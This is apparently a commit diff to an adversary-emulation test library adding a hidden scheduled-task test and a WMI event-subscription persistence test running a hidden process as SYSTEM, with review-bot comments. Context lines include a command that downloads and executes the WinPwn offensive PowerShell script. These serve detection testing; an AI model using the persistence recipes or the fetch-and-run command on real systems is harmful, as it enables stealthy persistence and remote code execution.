diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml index 6b57de3d..95363202 100644 --- a/atomics/T1053.005/T1053.005.yaml +++ b/atomics/T1053.005/T1053.005.yaml @@ -164,3 +164,18 @@ atomic_tests: schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1 reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1 name: command_prompt +- name: Import XML Schedule Task with Hidden Attribute + auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4 + description: | + Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute. + This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2. + supported_platforms: + - windows + executor: + name: powershell + elevation_required: true + command: | + $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml") + Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; } + cleanup_command: | + Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1 diff --git a/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml b/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml new file mode 100644 index 00000000..4965b36c --- /dev/null +++ b/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml @@ -0,0 +1,45 @@ + + + + 1.1.1 + atomicredteam + atomic red team schedule task with hidden attribute + \atomic red team + + + + true + + + + + LeastPrivilege + InteractiveToken + + + + IgnoreNew + false + true + true + true + false + + true + false + + true + true + true + false + false + PT0S + 6 + + + + C:\Windows\system32\calc.exe" + + + + diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index ca615878..13c0e718 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml 
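Review bot: The `description` lines of the new "Import XML Schedule Task with Hidden Attribute" test carry spelling errors that will be published verbatim in the generated docs: `Create an scheduled task` should read `Create a scheduled task`, and `tricbot` / `targetted attack campaigne the industroyer2` should read `TrickBot` / `targeted attack campaign Industroyer2`. The description would also help defenders more if it named the setting the test exercises, since the test name only says "hidden attribute" and the XML under `src/` is presumably what sets it; something like `The imported XML sets the task's hidden setting so it does not appear in the Task Scheduler UI` would do. The `cleanup_command` task name `atomic red team` matches the task URI in the XML, so cleanup is consistent as long as both files keep being edited together.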
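Review bot: What appears to be the task's command value in the new XML file reads `C:\Windows\system32\calc.exe"` with a trailing `"`, which as written points at a path that does not exist, so the registered task would likely fail to launch anything when its trigger fires; it should be `C:\Windows\system32\calc.exe`. The element tags of this XML have been stripped in this rendering, so only the text nodes can be judged here — if the quote is a rendering artifact rather than part of the committed file, disregard this. Because this is the file the test's `RegisterByXml` call imports, a broken command means the atomic would register a task that never performs the action the description promises.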
@@ -275,4 +275,4 @@ atomic_tests: $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t' iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1') generaldomaininfo -noninteractive -consoleoutput - name: powershell \ No newline at end of file + name: powershell diff --git a/atomics/T1546.003/T1546.003.yaml b/atomics/T1546.003/T1546.003.yaml index 5866f515..8c365a9e 100644 --- a/atomics/T1546.003/T1546.003.yaml +++ b/atomics/T1546.003/T1546.003.yaml @@ -1,7 +1,7 @@ attack_technique: T1546.003 display_name: 'Event Triggered Execution: Windows Management Instrumentation Event Subscription' atomic_tests: -- name: Persistence via WMI Event Subscription +- name: Persistence via WMI Event Subscription - CommandLineEventConsumer auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 description: | Run from an administrator powershell window. After running, reboot the victim machine. @@ -16,13 +16,13 @@ atomic_tests: - windows executor: command: | - $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'; EventNameSpace='root\CimV2'; QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs - $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'; CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs 
@@ -32,12 +32,53 @@ atomic_tests: } $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs cleanup_command: | - $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" - $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" + $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'" + $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'" $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue $FilterConsumerBindingToCleanup | Remove-WmiObject $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject name: powershell elevation_required: true +- name: Persistence via WMI Event Subscription - ActiveScriptEventConsumer + auto_generated_guid: fecd0dfd-fb55-45fa-a10b-6250272d0832 + description: | + Run from an administrator powershell window. After running, reboot the victim machine. + After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. 
+ Code references + + https://gist.github.com/mgreen27/ef726db0baac5623dc7f76bfa0fc494c + + supported_platforms: + - windows + executor: + command: | + $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'; + EventNameSpace='root\CimV2'; + QueryLanguage="WQL"; + Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; + $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments $FilterArgs + + $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'; + ScriptingEngine='VBScript'; + ScriptText=' + Set objws = CreateObject("Wscript.Shell") + objws.Run "notepad.exe", 0, True + '} + $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class ActiveScriptEventConsumer -Arguments $ConsumerArgs + + $FilterToConsumerArgs = @{ + Filter = $Filter; + Consumer = $Consumer; + } + $FilterToConsumerBinding = Set-WmiInstance -Namespace 'root/subscription' -Class '__FilterToConsumerBinding' -Arguments $FilterToConsumerArgs + cleanup_command: | + $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class ActiveScriptEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'" + $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'" + $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue + $FilterConsumerBindingToCleanup | Remove-WmiObject + $EventConsumerToCleanup | Remove-WmiObject + $EventFilterToCleanup | Remove-WmiObject + name: powershell + elevation_required: true \ No newline at end of file 
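Review bot: The three `Set-WmiInstance` calls in the new ActiveScriptEventConsumer test spell the namespace inconsistently (`"root\subscription"` twice, then `'root/subscription'`) while the `cleanup_command` uses `root/subscription`; settling on one form, e.g. `-Namespace root/subscription` as in the cleanup, would make the block easier to scan. On the documentation side, the `ScriptText` runs `objws.Run "notepad.exe", 0, True`, where window style `0` hides the window, so the description's `you should see notepad.exe running as SYSTEM` is only true of the process list (Task Manager / `Get-Process`), not the desktop; saying so explicitly would save testers from concluding the consumer never fired. It would also be worth stating in the description that ActiveScriptEventConsumer scripts are hosted by `scrcons.exe`, since that parent process is what a defender would expect to see spawning `notepad.exe` for this variant. The enclosing hunk starts on the previous line with the rename of the CommandLineEventConsumer cleanup names, which needs no change.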
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index f08b0f48..803f4e09 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -1060,3 +1060,5 @@ ed0335ac-0354-400c-8148-f6151d20035a
 82a9f001-94c5-495e-9ed5-f530dbded5e2
 f3a10056-0160-4785-8744-d9bd7c12dc39
 6c499943-b098-4bc6-8d38-0956fc182984
+fecd0dfd-fb55-45fa-a10b-6250272d0832
+cd925593-fbb4-486d-8def-16cbdf944bf4